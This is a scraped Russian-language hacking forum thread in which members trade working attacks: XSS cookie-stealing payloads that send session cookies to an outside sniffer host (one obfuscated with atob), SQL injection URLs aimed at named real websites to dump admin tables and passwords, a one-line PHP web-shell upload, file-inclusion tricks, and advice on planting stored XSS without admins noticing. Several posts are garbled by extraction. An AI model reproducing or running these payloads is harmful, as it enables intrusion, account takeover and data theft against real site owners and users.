О , большое спасибо за обяснения , теперь я понял то что написано в статьях , что пасивная это get , адресная строка а активная post в гостевой например. Спасибо )

NZT, полностью ответить на твой вопрос не смогу, потому что просто не понял его формулировки.

Экранирование кавычек никак не защищает от XSS. Единственное, где экранирование может помешать атаке, это внутри переменной JS при фильтрации угловых скобок и/или слеша.

Конструкция "document.write('" не имеет смысла. JS-код создает тег, который нужен, чтобы выполнить JS-код?


(new Image()).src='http://httpz.ru/123.gif?'+escape(document.cookie);




document.write('');

NZT said:
О , большое спасибо за обяснения , теперь я понял то что написано в статьях , что пасивная это get , адресная строка а активная post в гостевой например. Спасибо )


нет. пассивная может быть не только get или post, суть её в том что нужно каждый раз передавать в уязвимый параметр свой скрипт. активная же один раз записывается где-то , в бд например, и дальше уже «работает самостоятельно».

Чакэ Спасибо понял , тоесть чтобы пасивная сработала надо чтобы жертва нажала на ссылку , и только при нажатии на ссылку будут высылаться куки , а не при каждом захождении на страницу.

M_script, написал скрипт как ты написал но куки не пришли , может потому что в адресной строке этого сайта куда бы я не заходил нет значения id . Все строки адресов только такие http://localhost/denwer/dvwa/vulnerabilities/xss_s/ . В этом дело?

А если я в гостевой пишу то что ты написал то у меня в первом случае появляется как ты и написал , слово в слово а во втором случае document.write(\'\');

тоесть Ereee пошутил сказав что не получится xss на medium ? но у меня ничего не получается (чтоб я не писал алерт не выскакивает , а я все надписи в статье перепробывал)) Или он не шутил? Я делаю все как написано в статье для новичков но ничего в medium не получается. Для medium нужно уже читать более продвинутые статьи?

а во втором случае document.write(\'\');


В таком виде нормально должно быть:

document.write(atob(/PGltZyBzcmM9Imh0dHA6Ly9odHRwei5ydS8xMjMuZ2lmPw==/.source)+escape(document[/co/.source+/okie/.source])+atob(/Ij4=/.source));

тоесть Ereee пошутил сказав что не получится xss на medium ? но у меня ничего не получается (чтоб я не писал алерт не выскакивает , а я все надписи в статье перепробывал)) Или он не шутил? Я делаю все как написано в статье для новичков но ничего в medium не получается. Для medium нужно уже читать более продвинутые статьи?


на медиуме прокатывает такая штука, как в XSS reflected так и в XSS stored


Code:
ipt>alert(/xss/)

в XSS reflected, там просто замена идет


PHP:
echo'Hello '.str_replace('','',$_GET['name']);

в XSS stored тоже самое считай, только фильтруется переменная $message а $name все той же заменой фильтрует.

Наверное вышла новая версия в которой ничего не ломается ))

M_script , trololoman96 , спасибо вам за желание помочь , я уже рад что у меня на low что то получилось , но на медиуме все что вы написали тоже не работает, может у меня что то не так. Единственое что , если кто знает в какой из таких площадок для взлома есть пасивная , а не активная xss, хочу ее испробовать , но не охота все подряд качать и проверять , если кто знает насчет пасивной xss вы мне облегчите задачу.

И в чем разница между xss reflected и stored , у меня только в stored все работало а в reflected ничего не получилось.

И в чем разница между xss reflected и stored , у меня только в stored все работало а в reflected ничего не получилось.


тут имеется ввиду xss reflected как пассивная и сторед как активная. В reflected, xss пиши в имени, и перед этим либо через оперу отредактируй исходник и убери ограничение в input'е на 10 символов, либо на лету через temper data уже пиши свою xss и все получится

trololoman96, ты мне очень помог , я как раз искал пасивную xss. Ограничение у меня не стоит. Продолжу тренироваться . Спасибо.

Code:
http://www.dun[google]glac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,unhex(hex(colum n_name)),5,6,7,8,9,10,11,12,13+from+information_sc hema.columns+where+table_name=0x74626c5f61646d696e +limit+0,1--

таблица tbl_admin

помогите только именно с этим запросом

там нет таблицы tbl_admin, поэтому ошибка и вылетает


Code:
http://www.dunglac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,concat_ws%280x3 a,user,pass%29,5,6,7,8,9,10,11,12,13+from+admin

Code:
http://anavar.ru/articls/?id=100+and+1=0+union+select+1,load_file('/home/www/zayts78/htdocs/includes/article_inc.php'),3,4,5,6,7--

тут прав не хватает, или я что-то не так делаю?

faza02 said:

Code:
http://anavar.ru/articls/?id=100+and+1=0+union+select+1,load_file('/home/www/zayts78/htdocs/includes/article_inc.php'),3,4,5,6,7--

тут прав не хватает, или я что-то не так делаю?


с чего ты вообще взял что там file_priv?

я думал что если N, то будет ошибка

faza02 said:
я думал что если N, то будет ошибка


функция load_file в случае неудачи во время открытия файла, возвращает null

Нашел в одном модуле для булки xss. Пассивную xss.

проблемы:

1) в гугл хроме не передает на снифер данные(остальные браузеры ок)

2) куки передаются такие - bblastvisit=1326457186;%20bblastactivity=0, а bbpasword и sessionhash нет. what the fuck?

1) В хроме и ИЕ >= 8 есть анти-XSS фильтр. Твой JS-код просто не выполняется

2) httpOnly

M_script said:
1) В хроме и ИЕ >= 8 есть анти-XSS фильтр. Твой JS-код просто не выполняется
2) httpOnly


1) только для xss В строке?

2) ?

+ можно ли при пассивной xss оформить перенаправление на другую страницу без js

have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'on'' at line 1
Select id, password, login, admin from `cosm_users` as ` where login='admin'' && admin='on'` where login='admin'' && admin='on'


вываливает, когда в админке в поле логина пишу admin' ... Что можно придумать?

Code:
admin'or+1+and(select+1+from(select+count(*),conca t((select+password+from+cosm_users+limit+0,1),floo r(rand(0)*2))x+from+information_schema.tables+grou p+by+x)a)--+a

не?

Ereee said:
не?


не


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or+1+and(select+1+from(select+count(*),concat((se lect+password+from+cosm_users+l' at line 1
Select id, password, login, admin from `cosm_users` as ` where login='admin'+or+1+and(select+1+from(select+count( *),concat((select+password+from+cosm_users+limit+0 ,1),floor(rand(0)*2))x+from+information_schema.tab les+group+by+x)a)--+' && admin='on'` where login='admin'+or+1+and(select+1+from(select+count( *),concat((select+password+from+cosm_users+limit+0 ,1),floor(rand(0)*2))x+from+information_schema.tab les+group+by+x)a)--+' && admin='on'

Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.

shadowrun said:
не


можно попытаться обойти авторизацию, с помощью or 1=1,но тут нужно смотреть на примере. и ещё - я на 90% уверен, что на сайте есть инъекция и в get запросе.

Ereee said:
Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.


почти прокатил теперь, ска на коммент маериться


syntax to use near '/*'


если без коммента, то


syntax to use near ''


Спасибо, подобрал .

Бле, не даром пятн 13

Теперь, когда пытаюсь вывести login пишет следующую хрень:


Warning: mysql_query() [function.mysql-query]: Unable to save result set in...
Subquery returns more than 1 row

shadowrun said:
Бле, не даром пятн 13
Теперь, когда пытаюсь вывести login пишет следующую хрень:


LIMIT юзай

HElp SQli


Invalid SQL Query!


http://www.adult-images.net/view_comments.php?gal=-455' /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -

oODungVTOo said:
HElp SQli




Code:
http://www.adult-images.net/view_comments.php?gal=455'+and(select+1+from(selec t+count(*),concat((select+table_name+from+informat ion_schema.tables+limit+1,1),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)--+1

Ctrl+A


Code:
Duplicate entry 'COLLATIONS1' for key 'group_key'

Скажите , меня интересует такой вопрос : пока я в гостевой ищю активную xss я вписываю разные вещи в поля чтобы найти xss, а редактировать свои сообщения нельзя , то даже когда я найду активную xss то админ гостевой зайдет и увидит кучу разных подозрительных сообщений которые я писал чтобы найти xss и прикроет дырку, и я не смогу этим ничего сделать. И даже пользователи что то заподозрят. Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.

Expl0ited said:
LIMIT юзай


Можно подробней?

shadowrun said:
Можно подробней?


кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.


admin'or+1+and(select+1+from(select+count(*),conca t((select+login+from+cosm_users+
limit+0,1
),floor(rand(0)*2))x+from+information_schema.table s+grou p+by+x)a)--+a


limit+0,1 при выводе логина, ты скорее всего упустил.

d1v said:
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.
limit+0,1 при выводе логина, ты скорее всего упустил.


Нет. Все есть.

shadowrun said:
Нет. Все есть.




Code:
admin'or+1+and(select+1+from(select+count(*),conca t((select+password+from+cosm_users+where+login='ad min'),floor(rand(0)*2))x+from+information_schema.t able s+group+by+group+by+x)a)--+a

Др. вариантов не вижу.

--

Помогите и мне! Как вывести таблицы:


Code:
http://www.ozerna[notforgoogle]ya42.ru/credit/form/LADA/Priora%204D/**/14'-9999.9+union+select+1,2,3,version(),5,6,7--+f

"_" заменяет на пробел кажется или я что-то не так делаю?

NZT said:
Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.


Для начала написать любое сообщение и определить, где оно выводится на странице.

1) Если вне HTML-тегов, достаточно проверить фильтрацию символа [B]

M_script большое тебе спасибо за отзыв, я его перечитал наверное раз 10 и я понял следущее но не уверен что я правильно все понял.

1)Ты имеешь виду если собшение обычное без добавок html то надо написать

2)Если то что я написал в кавычках осталось в исходном коде то нашел xss , если заменилось то всеравно может быть xss , хоть в статье для новичков я читал что если кавычки заменились то это облом.

2.1) если в исходном коде пусто то проверить символы &lt и &gt

3)Потом в скрипте с алертом вместо <> вписать &lt , &gt , если скрипт напишется в сообщении значит есть xss , да он не выполняется но все же будут видеть то что я написал. И если вмето замененых кавычек появятся обычные значит пробовать вписать скрипт с обычными кавычками.

3.1) Если в скрипте фильтруются

Примеры:

1)


XSS


Символы (, ), = никто фильтровать не будет. Закрывать тег необязательно. Если проходит


[/QUOTE]
" if author else f"


[B]


YWxlcnQoJ1hTUycp - alert('XSS') в base64.

2)





Даже если кавычка экранируется





2.1)





В зависимости от функции-обрабочика может вообще не потребоваться обход фильтров. Но если какая-либо фильтрация мешает, можно использовать хтмл-сущности символов.





В myfunction() содержимое value передается как alert("test").

3)



a = 'XSS';
b = 'blablabla';
c = myfunction(a, b);



Закрываем строку, вставляем свой код.



a = '
[B]';alert('test');b='
';
b = 'blablabla';
c = myfunction(a, b);



Тег script можно закрыть даже внутри строки.



a = '
[B]


3.1)



text = 'XSS';
document.write('' + text + '');






text = '
[B]\x3Cscript\x3Ealert\x28\x27test\u0027\u0029\u003C\ u002Fscript\u003E
';
document.write('' + text + '');



Это лишь несколько общих примеров. Тема достаточно обширная и об этом можно написать еще много всего.


NZT said:
И это же получается не одно сообщение или подругому никак?


Расположение текста в коде можно посмотреть по чужим текстам, если до тебя кто-то уже писал на странице.


NZT said:
возможна ли в DVWA, xss на уровне high а то у меня ничего не получается )


Ни разу не пробовал проходить DVWA

faza02 said:
пахекал сайт, стал искать админку
нашел пару подозрительных файлов, открываю — шелл
попытался с него залиться, редактировать файлы, создавать папки — никак
могу только просматривать
есть вомзможность выполнять произвольный php код, но это мало чем помогло, загрузка файлов не работает
sm off
права есть
drwxrwxrwx на все папки
поискал юзера и пасс от бд
он ведь в wp-config.php находится?
не расшифровал
ну собстенно вопрос в том, что можно сделать?


Еслить можно выполнять код + папки на запись, то какая проблема?


PHP:
copy("http://site.ltd/wso.txt","/home/www/123.php");

P.S. В wp-config.php пасс хранится в открытом виде.

M_script спасибо, я не много что понял из твоего последнего сообщения но ты меня навел на мысль что может уже кто то использовал html-теги до меня как и мне всего лишь надо заглянуть в source странички и проверить где возможна xss. Но , я тренируюсь в DVWA и там в уровне low проходит alert() , а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ? И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )

Ты за несколько сообщений уже многому меня научил чего я абсолютно не знал и не догадывался. Спасибо.

а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ?


Я уже писал выше, там нужно


Code:
ript>alert()

потому что вырезает только а не трогает.


И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )


Именно в том случае xss нет. Но возможность обойти htmlspecialchars() есть только в том случае если уязвимый параметр выводится в ссылке и кодировка файла UTF-7.

как залить файл если работает Put Method ?

Bahamut said:
как залить файл если работает Put Method ?


Никак, если нет обработчика.

Ereee said:
Никак, если нет обработчика.


а где можно про это прочитать, просто сканер говорит что залил этим методом файл

Bahamut said:
а где можно про это прочитать, просто сканер говорит что залил этим методом файл


Сканер говорит умеет?))) ЖеСтЬ! Эти всякие методы нужны, когда в определенную папку не пускают, например при:

..

Можно обойти авторизацию, отправив POST запрос.

Вставить один символ в сообщение, не вызвав подозрений, очень просто. Но делать это нужно так, чтобы сообщение не искажало вид страницы в случае наличия уязвимости.


M_script ты имеешь виду чтобы такого небыло :

http://i28.fastpic.ru/thumb/2012/0115/3e/b4c55e9afea885eee55ad372d8866a3e.jpeg (http://fastpic.ru/view/28/2012/0115/b4c55e9afea885eee55ad372d8866a3e.jpg.html)

Это появляется когда я в строке name пишу

img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;

, а вот source :

Name: test
Message: This is a test comment.
Name: img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;



Я как не пытался это исправить чтобы name и message были на разных строчках у меня не получилось , подскажи что нужно написать чтобы message был на строчку ниже.


Я уже писал выше, там нужно
ript>alert()
потому что вырезает только а не трогает.


trololoman96 я это понимаю , но для того чтобы узнать что вырезается а что нет мне надо попробовать ript>alert()ript> , и тогда я уже знаю что писать , но ведь когда я это пробую то в сообщении появляется слово ript> : http://i31.fastpic.ru/thumb/2012/0115/da/21ae4c027009d8579c53a2c470e515da.jpeg (http://fastpic.ru/view/31/2012/0115/21ae4c027009d8579c53a2c470e515da.jpg.html) , и это уже вызовет у админа подозрение что здесь что то не так, правильно я думаю? Можно ли как то узнать что писать подругому , чтобы не вызвать подозрений , или все так делают и пофиг что будет и пофиг что страница искажается (как в первой части сообщения) или всетаки надо все делать акуратно ?

И еще вопрос , как xss работает? Я делаю xss и получаю куки всех зарегестрированых на сайте пользователей, теперь у меня свободный доступ к их аккаунтам . до какого времени? пока админ не прикроет дыру или пока пользователь не сменит пароль? Как это все работает? Спасибо за ответы )

В HTML:

[QUOTE="None"]

А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?

NZT said:
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?


Если сайт на заказ делали и админ ничего незнает, кроме как создание/редактирование новостей, то не узнает. Если опытный тру админ, то он по ссылке не перейдет, даже если перешел перелогинится(чтоб украденные куки были негодны) и зафиксить уязвимость.

Можно удалить сесию, (корректно выйти из админки) или удалить сесию на серваке, и ваши куки вам не помогут.

Понял. Большое спасибо за ответы.

права в папке есть, на правку, залив

но почему-то ничего не льется и не редактируется

сервер виндосовский

2ereee, это уже другой

http://www.toytricksy.com/?a=index

проконсультируйте это пхп инъекцыя иль нет??

pirat0 said:
http://www.toytricksy.com/?a=index
проконсультируйте это пхп инъекцыя иль нет??


нет. это ошибка подключения другого файла, который не передаётся в параметре.

http://ckk.sakh.com/interface.php?file=


Инклуд с фильтром:


PHP:
import_request_variables('GPC');

if (strstr($file,'..') ||strstr($file,'//') ||strstr($file,'http')

||strstr($file,'interface') ) exit;



Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)

http://www.sitc.ru/index.php?id=90000512

тиц 350

blind sql.

реально такое раскрутить? без information_schema то

Реально, также брутишь таблицы, колонки и через блайнд забираешь инфу. И еще, там не слепая инъекция:


Code:
http://www.sitc.ru/index.php?id=90000512%27+and+5=4+union+select+1,2, 3,4,5,version%28%29,7,8,9,10,11,12,13--+

-----------------------

AnGeI, думаю стоит копать в сторону соседних сайтов. Вот сайн на том же сервере

http://cdut.sakh.com/phpmyadmin/ - открытый phpmyadmin (setup.php нету)

есть инъекция, только толку от нее нет особого


Code:
http://cdut.sakh.com/?view=forum&fid=-2161%27+union+select+1,2,3,4,5,6--+

есть рабочий инклуд


Code:
http://cdut.sakh.com/?nauka=index&project=../../avatars/0.gif%00

залить аватару свою не удалось, там вылетает ошибка с open_basedir. Так что если найдешь что инклудить считай шел есть

Ну и доступ в админку, авторизация на самом сайте

...

Дальше копать лень, ибо все равно там ничего интересного нет, удачи

http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((

Ребята, какая то мне не понятная ситуация ))

в одном сервере мне надо "выгрузить" (дампить) SQL базу и чтоб нормально читался

через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..

но там также есть конфиграционный файл, с логином и паролем типа такого:


Code:
mysql username = "logn"
mysql password = "password"

###

'1 list' table name = "rep1"
'reports' table name prefix = "rep2"
'2' table name = "h"

mysql db name = "NAME"
mysql host = "127.0.0.1"
mysql port = "3306"
mysql unix socket = "/var/run/mysqld/mysqld.sock"

### config end

помогите снять информацию !

Не пинать сильно, можно сказать не соображаю в этом деле )) особо в кодинге php/sql, по этому лучше посоветуйте как можно "автоматический" метод.

через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..


ты уже сделал дамп? что ты в браузере открываешь?

если сделал, то скачай его на винт и открывай не в браузере.

если нет, то найди пма, залогинись с данными из файла и сделай экспорт базы. возможные папки:

phpmyadmin

pma

myadmin, etc... гугли

если есть доступ к файлам, то поставь дампер какой-нить, например:

http://sypex.net/ru/products/dumper/downloads/

если есть доступ к консоли, то через mysqldump сделай:

http://dev.mysql.com/doc/refman/5.1/en/mysqldump.html

pirat0 said:
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((


Там что-то типа


PHP:
$lang="";

if($_GET['language'] =='russian')$lang=1;

mysql_query("SELECT .. WHERE lang={$lang}AND ....");



Думаю что как-то так и выглядит код.

Инъекции нет.


AnGeI said:
Инклуд с фильтром:

PHP:
import_request_variables('GPC');

if (strstr($file,'..') ||strstr($file,'//') ||strstr($file,'http')

||strstr($file,'interface') ) exit;



Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)


Этот код просто написан по реакции скрипта на параметры, не более.


justonline said:
http://www.sitc.ru/index.php?id=90000512
тиц 350
blind sql.
реально такое раскрутить? без information_schema то


Где ты там Blind нашел?

http://www.sitc.ru/index.php?id=90000512%27%20and%201=3%20union%20sel ect%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13%20--%201

Да, версия 4, обычный брут таблиц/колонок катит.

Эээ..идиотский фильтр

Дело в том, что фильтруется точка information_shema. так что information_shema никак ненапишешь...как обойти такой фильтр?

narviss said:
Эмм...у меня фильтруется слово
information_shema.
как обойти такой фильтр?


пробуй разные регистры, пробуй /*!information_schema.tables*/

пробуй `information_scheme`.`tables`

Помогите!

Товарищи!

Откровенно говоря задолбался

Начал тут познавать прелести xss.

Просканил сайт одного провайдера, нашел вот что:


PHP:
" onmouseover=prompt(903167) bad="

типо это xss, уязвимый параметр.

сканил WVS, с английским проблем особо нет, но тут я затупил.

мануалов не нашел, гугл мне не помог.

прошу вас мне пояснить как это использовать, и желательно не выходя из программы^^

PS: Знания веб хакинга есть, говорю ж осталось xss доучить

PSS единственное что нашел, как пример:


PHP:
http://www.acunetix.com/blog/web-security-zone/articles/web-vulnerabilities-pligg/

2stan0009,

прочитай этот пост

КЛАЦ! (https://antichat.live/showpost.php/p/2985774/postcount/157/)

Вопросы должны отпасть.

Ereee said:
2stan0009
,
прочитай этот пост
КЛАЦ! (https://antichat.live/showpost.php/p/2985774/postcount/157/)
Вопросы должны отпасть.


что-то похожее, но не в моем случае.

видел примеры таких xss типа такого запроса


PHP:
http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=0&IDS=1%22+onmouseover=alert(412439912585)+&PAGE=1

про кавычки все правильно сказано, а про остальное соотнести не могу

а еще...

может verb tampering проще?

кто нибудь встречался?

Ребята, есть программа, с интерфейсом (понятно для новичнов) для того, чтоб проверил какие директории и файлы доступны для чтения ?

т.е. вбиваешь WEB адрес и он сканирует сайт и выдает отчет по файлам и папкам.

т.п. программы, как Acunetix Web Vulnerability Scanner не советовать, хочется менького и без лишних гемор.

B1t.exe said:
Ребята, есть программа, с интерфейсом (понятно для новичнов) для того, чтоб проверил какие директории и файлы доступны для чтения ?
т.е. вбиваешь WEB адрес и он сканирует сайт и выдает отчет по файлам и папкам.
т.п. программы, как Acunetix Web Vulnerability Scanner не советовать, хочется менького и без лишних гемор.


ну гугл site: xxx.ru

самый простой вариант

Lilo said:
ну гугл site: xxx.ru
самый простой вариант


да ну ) ты че..

B1t.exe said:
да ну ) ты че..


Avalanche

stan0009 said:
что-то похожее, но не в моем случае.
видел примеры таких xss типа такого запроса

PHP:
http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=0&IDS=1%22+onmouseover=alert(412439912585)+&PAGE=1

про кавычки все правильно сказано, а про остальное соотнести не могу
а еще...
может verb tampering проще?
кто нибудь встречался?


Verb Tampering? Забудь, сейчас таких уязвимостей мало(появился один с php, суть в том. что при передаче HEAD-ом php-скрипт выполнится до первого вывода инфы, что открывается баги). Твой WVS не сможет найти скульи без error-а, лучше всего с помощью WVS найти все скрипты, а шаманить уже самому. Насчет mil.be, у меня при твоем запросе перенаправляет. Чтобы отключить перенаправление, нужно отключить Javascript(XSS работать не будет), или отключить autoredirect(которое включено по умолчанию на всех браузерах).

2B1t.exe, информация об доступности на запись хранится на сервере, ты просто не сможешь этого сделать.

2Lilo,

Konqi said:
пробуй разные регистры, пробуй /*!information_schema.tables*/
пробуй `information_scheme`.`tables`


нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?

narviss said:
нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?


точьку ничем не заменишь, попробуй urlencode, хотя врятли поможет

. = %2E

narviss said:
нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?


Как вариант, пробуй:

infOrmAtion_schEma./**/tabLeS

P.S. Обход точки невозможен. Придется угадать таблицы.

I got the "order by" here.


Code:
https://www.unicef.org.hk/news/list_detail.php?id=234+order+by+17--+-

Now "union select" does not work.


Code:
https://www.unicef.org.hk/news/list_detail.php?id=234+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17--+-



Code:
https://www.unicef.org.hk/news/list_detail.php?id=234%27%20and%28select%201%20fro m%28select%20count%28*%29,concat%28%28select%20%28 selectconcat%280x7e,0x27,cast%28version%28%29%20as %20char%29,0x27,0x7e%29%29%20from%20information_sc hema.tables%20limit%200,1%29,floor%28rand%280%29*2 %29%29x%20frominformation_schema.tables%20group%20 by%20x%29a%29%20and%201=1+--+

Where is my fault now?

что то не могу дальше вывести


Code:
http://www.lenta.cjes.ru/
?nid=1089' and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x

2Faaax,


Code:
http://www.lenta.cjes.ru/?m=1&y=2012&lang=rus&nid=1089'+and(select+1+from(select+count(*),concat ((select+concat(table_name,0x00)+from+information_ schema.tables+limit+1,1),floor(rand(0)*2))x+from+i nformation_schema.tables+group+by+x)a)--+f

Результат:


Code:
Duplicate entry 'COLLATIONS' for key 1

Проблема с XSS. Пока что не хочу давать линк... проблема в том, что я хочу, чтоб при вводе в поиск вылетел алерт. Что я только не пробовал, но результат один и тот же:

ввожу alert(), нажимаю Ентер, в поиске остается alert() - вывод [B]">

jecka3000 said:
Какие есть еще варианты?


Ссылку покажи.

Code:
http://brandkom.com.ua/shop_content.php?coID=10

Есть уязвимость тут?

_Spamer_ said:

Code:
http://brandkom.com.ua/shop_content.php?coID=10

Есть уязвимость тут?


Не думаю. Так как в твоем случаи:


Code:
+and+1=1 true
+and+1=0 true

Да и ничего не меняется при вставке кавычки.

jecka3000, вариантов очень много. Для начала надо определить, какие теги пропускает фильтр и в зависимости от этого использовать события. Все зависит от конкретного сайта. Скинь ссылку в личку, если не хочешь выкладывать в теме.

Подскажите, можно ли раскрутить данный баг?


Code:
http://stat.webyse.com/audience.php?id=1563

MadFun. said:
Подскажите, можно ли раскрутить данный баг?

Code:
http://stat.webyse.com/audience.php?id=1563



никак. из-за отсутсвия тэгов просто выпадает кусок js скрипта.

хотя там есть пассиваная хсс:


http://stat.webyse.com/audience.php?id=%3Cscript%3Ealert();%3C/script%3E


можешь попытаться выташить куки.

Просканировал сайт Vulnerability сканером нашел уязвимость (ошибка Mysql при ?id=1'), havij позволяет просмотреть все таблицы. А вот в браузере эта ошибка не отображается. Не подскажите почему так?

зы. Извините за нубовский вопрос.

В исходный код загляни, может там что найдешь. Ты уверен, что ошибка точно выводится?

gl0w said:
В исходный код загляни, может там что найдешь. Ты уверен, что ошибка точно выводится?


В исходном коде сведений об ошибке нет. При вводе news.php?id=1' открывается просто страничка news.php

И havij, и vulnerability говорят что ошибка и с легкостью пользуются этой уязвимостью

Qzen said:
В исходном коде сведений об ошибке нет. При вводе news.php?id=1' открывается просто страничка news.php
И havij, и vulnerability говорят что ошибка и с легкостью пользуются этой уязвимостью


пост запросы смотрел?

Gorev said:
пост запросы смотрел?


Скорее всего там ошибка. Только в виду моей нубизны я не знаю как смотреть)

Не подскажите, может есть какое то дополнение на Firefox для просмотра?

Gorev said:
пост запросы смотрел?


Врятли он отправлял POST запросы, там надо вручную указывать все параметры, а он не додумался бы )


Qzen said:
При вводе news.php?id=1' открывается просто страничка news.php


Попробуй выключить редирект

gl0w said:
Врятли он отправлял POST запросы, там надо вручную указывать все параметры, а он не додумался бы )
Попробуй выключить редирект


Вот! Поставил оперу, отключил редирект и сработало. В ФФ почему то все равно перенаправлялось.

Спасибо.

Qzen said:
Вот! Поставил оперу, отключил редирект и сработало. В ФФ почему то все равно перенаправлялось.
Спасибо.


Ошибки не возникало потому что, в новых версиях FireFox кодирует ' как %27. Нужно патчить. Патч можно скачать тут: https://rdot.org/forum/showthread.php?t=1403

Это MySQL?

_http://www.minprom.gov.by/organizacii?OKPO=24+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17

Версию вывел, а как сейчас таблицы вывести, подскажите?

_http://www.oim.by/en/department'and(select*from(select(name_const(versi on(),1)),name_const(version(),1))a)and'

Duplicate column name '5.5.8'

Нашел активку на одном сайте...нет фильтра имени и фамилии. но стоит ограничение по символам. я разбиваю код на две части...пихаю...получается такая штука

перед .ru стоит пробел и естественно снифер не срабатывает. как можно изловчиться и исправить?

justonline, используй сервис сокращения ссылок

+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+

подскажите а как теперь узнать из каких именно таблиц вывелись колонки??

например вывел "password" а название таблицы у этой колонки как узнать

pirat0 said:
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать


union select 1,2,concat(table_name,0x3a,column_name),4,5,6

спосибо, а то название таблиц не стандартное - "a_affiliates"

Code:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index

немного не понял ошибку, объясните

faza02 said:

Code:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index

немного не понял ошибку, объясните


index.php:


PHP:
include'include/include.php';

include'some/'.$_GET[child] .'.php';



include/include.php:


PHP:
[...]

functionstrips(){/*whatever*/}

[...]



index.php?

функция и так обозначается, и инклудя свой же файл ты вызываешь обозначение той же самой функции, но т.к. она уже обозначена ты получаешь ошибку.

pirat0 said:
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать


Сразу выводи название таблиц и колонок, чтобы их потом отдельно не смотреть.


union select 1,2,concat_ws(0x3a,table_name,column_name),4,5,6 from information_schema.columns where column_name like '%pass%' limit 0,20-- f


UPD: Konqi уже ответил не заметил

возможно ли в прошивку модема адсл вшить веб шелл?

Ro Man said:
возможно ли в прошивку модема адсл вшить веб шелл?


Зачем? Что толку от веб-шелла то?

p.s хотя можно попробовать залить cgi шелл, но не уверен.


Code:
Login: admin
Password:
NAME=DSL_2640NRU
VERSION=1.0.0
BUILDTIME=Fri Mar 18 08:01:43 UTC 2011
VENDOR=D-Link Russia
BUGS=
SUMMARY=Root filesystem image for DSL_2640NRU
BOARDID=96328AVNG_N31
For help, type 'help' or '?'.
DSL_2640NRU# sh

BusyBox v1.00 (2011.03.18-07:59+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# ls /
VERSION data etc linuxrc opt sbin tmp var
bin dev lib mnt proc sys usr webs
# ls /webs/
www
# ls /webs/www
css favicon.ico index.cgi passw.html
dlink.css fwupdate.cgi index.html scripts
fastweb.cgi image info.html templates
#

Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок


http://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'

Post Sql

Запрос для выполнения SQL инъекции:

POST /register.php HTTP/1.1

Host: partners.gigagame.ru

Content-Type: application/x-www-form-urlencoded

Content-Length: 78

